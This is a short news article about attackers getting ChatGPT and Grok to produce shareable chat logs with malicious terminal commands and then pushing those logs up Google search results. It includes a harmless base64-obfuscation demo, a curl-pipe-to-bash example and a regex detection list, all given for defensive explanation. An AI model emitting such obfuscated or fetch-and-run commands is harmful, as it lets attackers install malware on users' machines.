AI Search Scams: Hackers Seed Google With Malicious Commands
11 Dec
Summary
- Hackers use AI chatbots to seed Google search results with malicious commands.
- Victims are tricked into executing commands, leading to malware installation.
- The attack bypasses traditional security measures by exploiting user trust in AI.

Hackers are now exploiting artificial intelligence to seed Google search results with dangerous commands. The emerging threat uses AI assistants to generate instructions that, when executed by unsuspecting users, let attackers install malware. The method relies on making AI-generated chat logs containing malicious commands publicly visible and boosting them in search rankings.
The attack vector was detailed in a recent report, which found that both ChatGPT and Grok could be manipulated into producing shareable chat logs carrying malicious commands. In one documented instance, a Mac user searching for disk space cleanup advice was led to a poisoned AI chat and executed a harmful terminal command that installed malware. The technique bypasses conventional security warnings because users implicitly trust platforms like Google and popular AI chatbots.
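The report does not reproduce the exact payload, but commands of this kind typically hide their intent behind encoding so that the pasted one-liner reads as meaningless noise. The Python snippet below is a hypothetical, harmless illustration of that pattern; the base64 blob wraps a benign stand-in, not a real attack command.

```python
import base64

# Hypothetical illustration: wrapping the real payload in base64 makes the
# pasted "cleanup" command unreadable at a glance. The payload here is a
# harmless stand-in, not an actual attack command.
blob = base64.b64encode(b'echo "a real attack would fetch its installer here"').decode()

# What a victim sees in a poisoned chat log might resemble:
print(f'pasted one-liner: bash -c "$(echo {blob} | base64 -d)"')

# Decoding the blob *before* running anything reveals what would execute:
print("decoded payload:", base64.b64decode(blob).decode())
```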
As of December 2025, the full scope of the campaign remains under investigation, though the specific poisoned chat described above has been removed from Google search results. Users are strongly advised to exercise extreme caution before executing commands found online, even on trusted platforms. Standard cybersecurity practices, such as verifying what a command actually does before running it, remain crucial; a sketch of one such check follows.
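As a minimal sketch of what verifying a command before execution could look like, the helper below flags a few common red flags in a copied command. The patterns and the flag_risky function are illustrative assumptions, not a vetted security tool or a complete blocklist.

```python
import re

# Illustrative heuristics only; a real checker would need a far broader
# and regularly updated set of patterns.
RISKY_PATTERNS = [
    r"curl[^|]*\|\s*(ba|z)?sh",   # piping a remote script straight into a shell
    r"base64\s+(-d|--decode)",    # decoding an obfuscated payload at run time
    r"\bsudo\b",                  # requesting elevated privileges
    r"\bosascript\b",             # scripting macOS dialogs and system events
]

def flag_risky(command: str) -> list[str]:
    """Return the risky patterns a copied command matches, if any."""
    return [p for p in RISKY_PATTERNS if re.search(p, command)]

if __name__ == "__main__":
    pasted = "curl -fsSL https://example.com/cleanup.sh | bash"
    hits = flag_risky(pasted)
    if hits:
        print("Do not run this blindly; it matches:", hits)
```

Even a rough check like this surfaces the pipe-to-shell pattern commonly used to fetch and run remote installers.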